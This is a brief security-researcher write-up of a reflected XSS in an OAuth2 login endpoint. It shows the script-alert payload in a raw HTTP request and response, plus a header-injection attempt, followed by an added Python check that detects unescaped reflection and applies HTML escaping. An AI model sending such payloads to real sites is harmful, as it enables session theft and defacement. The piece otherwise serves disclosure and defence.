Reflected XSS on a Public Program


Technical Analysis

&Set-Cookie: <script>alert("Hacked By Deathstroke")</script>


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


<script>alert("Hacked By Deathstroke")</script>

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin
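The request and response above show the pattern behind this finding: the query string sent to /oauth2/login/ comes back verbatim inside a text/html body. The following is an added example (not part of the original write-up) of the two checks a defender would apply to it: detecting unencoded reflection of request input in an HTML response, and the output-encoding fix that removes it. The sample body and the render_login_error function are constructed for illustration; the payload string and Content-Type header are taken from the write-up.

```python
import html
from urllib.parse import unquote

# Constructed sample: the raw query string from the write-up and a minimal
# HTML body that echoes it without encoding (the vulnerable behaviour).
SAMPLE_QUERY = '<script>alert("Hacked By Deathstroke")</script>'
SAMPLE_BODY_VULNERABLE = (
    '<html><body><p>Login failed for ' + SAMPLE_QUERY + '</p></body></html>'
)


def reflected_unescaped(query: str, body: str) -> bool:
    """True when the URL-decoded query string appears in the body verbatim.

    Only input containing characters that must be entity-encoded in an HTML
    text context is flagged; plain alphanumerics reflect harmlessly."""
    decoded = unquote(query)
    if not any(ch in decoded for ch in '<>"\'&'):
        return False
    return decoded in body


def render_login_error(user_input: str) -> str:
    """Hardened rendering (hypothetical server-side fix): the untrusted value
    is entity-encoded for an HTML text context before concatenation."""
    return '<p>Login failed for ' + html.escape(user_input, quote=True) + '</p>'


def check_response(content_type: str, query: str, body: str) -> dict:
    """Combine the two conditions that make reflected XSS exploitable:
    an HTML content type and unencoded reflection of request input."""
    is_html = content_type.split(';')[0].strip().lower() == 'text/html'
    raw = reflected_unescaped(query, body)
    return {'html_response': is_html, 'raw_reflection': raw,
            'exploitable': is_html and raw}


if __name__ == '__main__':
    ct = 'text/html; charset=utf-8'  # Content-Type from the write-up's response
    print(check_response(ct, SAMPLE_QUERY, SAMPLE_BODY_VULNERABLE))
    fixed_body = '<html><body>' + render_login_error(SAMPLE_QUERY) + '</body></html>'
    print(check_response(ct, SAMPLE_QUERY, fixed_body))
```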

Proof Of Concept




Naveen J
Security Researcher | Security Engineer | Security Nerd…